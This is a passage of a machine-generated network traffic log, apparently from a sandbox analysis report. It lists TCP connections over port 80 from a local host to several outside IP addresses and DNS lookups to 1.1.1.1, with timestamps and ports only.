Jul 5, 2024 03:23:33.342534065 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:33.346765041 CEST	80	52657	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:33.346822977 CEST	52657	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:33.962949991 CEST	52657	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:34.983387947 CEST	52658	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:34.988238096 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:34.988306999 CEST	52658	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:34.991939068 CEST	52658	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:34.996691942 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:36.052324057 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:36.052347898 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:36.052395105 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:36.052658081 CEST	52658	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:36.056061029 CEST	52658	80	192.168.2.4	147.92.36.231
Jul 5, 2024 03:23:36.060816050 CEST	80	52658	147.92.36.231	192.168.2.4
Jul 5, 2024 03:23:41.414462090 CEST	52659	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:41.419322014 CEST	80	52659	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:41.419389963 CEST	52659	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:41.421571016 CEST	52659	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:41.426609039 CEST	80	52659	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:42.932794094 CEST	52659	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:42.980106115 CEST	80	52659	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:43.994323015 CEST	52660	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:43.999663115 CEST	80	52660	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:43.999778032 CEST	52660	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:44.022115946 CEST	52660	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:44.026966095 CEST	80	52660	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:45.525391102 CEST	52660	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:45.576134920 CEST	80	52660	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.543317080 CEST	52661	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:46.548192024 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.548255920 CEST	52661	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:46.550359011 CEST	52661	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:46.555217028 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555227995 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555259943 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555316925 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555375099 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555382967 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555391073 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555475950 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:46.555484056 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:48.056566000 CEST	52661	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:48.108129978 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:49.075650930 CEST	52662	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:49.080528975 CEST	80	52662	116.213.43.190	192.168.2.4
Jul 5, 2024 03:23:49.080593109 CEST	52662	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:49.082597017 CEST	52662	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:23:49.087445974 CEST	80	52662	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:02.820719004 CEST	80	52659	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:02.820765018 CEST	52659	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:05.382843971 CEST	80	52660	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:05.382952929 CEST	52660	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:07.929770947 CEST	80	52661	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:07.935044050 CEST	52661	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:10.462878942 CEST	80	52662	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:10.464211941 CEST	52662	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:10.470057011 CEST	52662	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:10.474803925 CEST	80	52662	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:15.856862068 CEST	52663	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:15.861819983 CEST	80	52663	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:15.861915112 CEST	52663	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:15.863599062 CEST	52663	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:15.868340969 CEST	80	52663	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:16.479969025 CEST	80	52663	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:16.480310917 CEST	80	52663	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:16.480369091 CEST	52663	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:17.369148016 CEST	52663	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:18.509263992 CEST	52664	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:18.514194965 CEST	80	52664	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:18.514265060 CEST	52664	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:18.527865887 CEST	52664	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:18.532649994 CEST	80	52664	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:19.220621109 CEST	80	52664	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:19.220711946 CEST	80	52664	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:19.220721960 CEST	80	52664	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:19.220765114 CEST	52664	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:20.044162989 CEST	52664	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:21.064299107 CEST	52665	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:21.069222927 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.069300890 CEST	52665	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:21.080123901 CEST	52665	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:21.085285902 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085297108 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085304976 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085314035 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085937023 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085947037 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085962057 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085971117 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.085979939 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.744502068 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.744618893 CEST	80	52665	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:21.747606993 CEST	52665	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:22.588527918 CEST	52665	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:23.606930971 CEST	52666	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:23.611876011 CEST	80	52666	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:23.611948013 CEST	52666	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:23.613780975 CEST	52666	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:23.618535042 CEST	80	52666	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:24.216188908 CEST	80	52666	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:24.216538906 CEST	80	52666	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:24.216721058 CEST	52666	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:24.220144033 CEST	52666	80	192.168.2.4	203.161.55.102
Jul 5, 2024 03:24:24.225564003 CEST	80	52666	203.161.55.102	192.168.2.4
Jul 5, 2024 03:24:29.610135078 CEST	52667	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:29.615067005 CEST	80	52667	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:29.615139961 CEST	52667	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:29.616614103 CEST	52667	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:29.621522903 CEST	80	52667	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:31.141675949 CEST	52667	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:31.192120075 CEST	80	52667	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:32.153209925 CEST	52668	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:32.158370018 CEST	80	52668	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:32.158446074 CEST	52668	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:32.160099030 CEST	52668	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:32.165112019 CEST	80	52668	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:33.668093920 CEST	52668	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:33.720141888 CEST	80	52668	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.689718008 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:34.694694996 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.694758892 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:34.697621107 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:34.702423096 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702487946 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702497959 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702507019 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702516079 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702570915 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702663898 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702672005 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:34.702681065 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:36.218080997 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:36.268057108 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:37.231187105 CEST	52670	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:37.236495018 CEST	80	52670	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:37.236553907 CEST	52670	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:37.238794088 CEST	52670	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:37.243649960 CEST	80	52670	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:51.028117895 CEST	80	52667	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:51.028175116 CEST	52667	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:53.570825100 CEST	80	52668	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:53.570884943 CEST	52668	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:56.285242081 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:56.285288095 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:56.285362959 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:56.285362959 CEST	52669	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:56.294951916 CEST	80	52669	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:58.633512020 CEST	80	52670	116.213.43.190	192.168.2.4
Jul 5, 2024 03:24:58.633656025 CEST	52670	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:58.634489059 CEST	52670	80	192.168.2.4	116.213.43.190
Jul 5, 2024 03:24:58.643336058 CEST	80	52670	116.213.43.190	192.168.2.4
Jul 5, 2024 03:25:03.881622076 CEST	52671	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:03.886415958 CEST	80	52671	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:03.886485100 CEST	52671	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:03.943846941 CEST	52671	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:03.948635101 CEST	80	52671	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:04.380038023 CEST	80	52671	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:04.380085945 CEST	52671	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:05.478550911 CEST	52671	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:05.484719038 CEST	80	52671	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:06.497230053 CEST	52672	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:06.502473116 CEST	80	52672	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:06.502563000 CEST	52672	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:06.504221916 CEST	52672	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:06.509134054 CEST	80	52672	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:06.979873896 CEST	80	52672	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:06.980118036 CEST	52672	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:08.009792089 CEST	52672	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:08.014755964 CEST	80	52672	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.030091047 CEST	52673	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:09.035062075 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.038177967 CEST	52673	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:09.042121887 CEST	52673	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:09.047043085 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047063112 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047072887 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047080040 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047146082 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047166109 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047203064 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047220945 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.047245026 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.516643047 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:09.522088051 CEST	52673	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:10.541038036 CEST	52673	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:10.545872927 CEST	80	52673	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:11.562096119 CEST	52674	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:11.569992065 CEST	80	52674	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:11.570164919 CEST	52674	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:11.574084044 CEST	52674	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:11.579199076 CEST	80	52674	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:12.051940918 CEST	80	52674	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:12.051956892 CEST	80	52674	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:12.052073002 CEST	52674	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:12.055030107 CEST	52674	80	192.168.2.4	13.248.169.48
Jul 5, 2024 03:25:12.059959888 CEST	80	52674	13.248.169.48	192.168.2.4
Jul 5, 2024 03:25:17.424086094 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:17.428937912 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:17.430226088 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:17.434107065 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:17.438972950 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:18.950196028 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.070519924 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.070535898 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.070544958 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.070586920 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.070596933 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.070672035 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.070672035 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.070672035 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.070672035 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.070837975 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.071499109 CEST	80	52675	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.076678991 CEST	52675	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.965969086 CEST	52676	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.970900059 CEST	80	52676	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:19.970958948 CEST	52676	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.972876072 CEST	52676	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:19.977730036 CEST	80	52676	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:20.911397934 CEST	80	52676	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:20.911544085 CEST	80	52676	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:20.914160967 CEST	52676	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:21.480163097 CEST	52676	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:22.496999025 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:22.501856089 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.501924038 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:22.503922939 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:22.508794069 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.508805990 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.508814096 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.508838892 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.508847952 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.508958101 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.509054899 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.509063959 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:22.509073019 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:23.439352036 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:23.496243954 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:23.673757076 CEST	80	52677	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:23.676300049 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:24.009902954 CEST	52677	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.028321028 CEST	52678	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.033279896 CEST	80	52678	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:25.036284924 CEST	52678	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.040218115 CEST	52678	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.044992924 CEST	80	52678	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:25.965384960 CEST	80	52678	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:25.965450048 CEST	80	52678	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:25.965507984 CEST	52678	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.972203016 CEST	52678	80	192.168.2.4	38.47.232.224
Jul 5, 2024 03:25:25.976989985 CEST	80	52678	38.47.232.224	192.168.2.4
Jul 5, 2024 03:25:39.516220093 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:39.521064043 CEST	80	52679	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:39.521164894 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:39.522625923 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:39.528096914 CEST	80	52679	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:40.191385031 CEST	80	52679	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:40.195285082 CEST	80	52679	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:40.195339918 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:40.195391893 CEST	80	52679	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:40.195436954 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:41.025476933 CEST	52679	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:42.043417931 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:42.051451921 CEST	80	52680	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:42.051532030 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:42.054600954 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:42.059617996 CEST	80	52680	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:42.728585005 CEST	80	52680	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:42.731800079 CEST	80	52680	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:42.731889009 CEST	80	52680	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:42.731920958 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:42.731982946 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:43.556808949 CEST	52680	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:44.575076103 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:44.579984903 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.580326080 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:44.584398031 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:44.589240074 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589251041 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589260101 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589268923 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589279890 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589409113 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589418888 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589436054 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:44.589446068 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:45.233792067 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:45.237335920 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:45.237407923 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:45.237740993 CEST	80	52681	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:45.237781048 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:46.088032961 CEST	52681	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.106080055 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.110971928 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.111063004 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.112498045 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.117264986 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.763231039 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.766855955 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.766868114 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.766876936 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.766937017 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.767003059 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.775326014 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.775336027 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.775346994 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.775357962 CEST	80	52682	35.190.52.58	192.168.2.4
Jul 5, 2024 03:25:47.775449038 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.777452946 CEST	52682	80	192.168.2.4	35.190.52.58
Jul 5, 2024 03:25:47.782202005 CEST	80	52682	35.190.52.58	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 03:22:17.688066959 CEST	53	64200	1.1.1.1	192.168.2.4
Jul 5, 2024 03:22:19.201766014 CEST	62497	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:22:20.170419931 CEST	53	62497	1.1.1.1	192.168.2.4
Jul 5, 2024 03:22:36.138011932 CEST	56444	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:22:36.476174116 CEST	53	56444	1.1.1.1	192.168.2.4
Jul 5, 2024 03:23:10.559772015 CEST	63094	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:23:10.693478107 CEST	53	63094	1.1.1.1	192.168.2.4
Jul 5, 2024 03:23:18.781533957 CEST	50584	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:23:18.811526060 CEST	53	50584	1.1.1.1	192.168.2.4
Jul 5, 2024 03:23:26.872267008 CEST	54672	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:23:27.372152090 CEST	53	54672	1.1.1.1	192.168.2.4
Jul 5, 2024 03:23:41.059914112 CEST	55044	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:23:41.412219048 CEST	53	55044	1.1.1.1	192.168.2.4
Jul 5, 2024 03:24:15.482251883 CEST	55328	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:24:15.854705095 CEST	53	55328	1.1.1.1	192.168.2.4
Jul 5, 2024 03:24:29.236759901 CEST	49721	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:24:29.608244896 CEST	53	49721	1.1.1.1	192.168.2.4
Jul 5, 2024 03:25:03.817570925 CEST	56634	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:25:03.830343008 CEST	53	56634	1.1.1.1	192.168.2.4
Jul 5, 2024 03:25:17.062087059 CEST	63411	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:25:17.421808004 CEST	53	63411	1.1.1.1	192.168.2.4
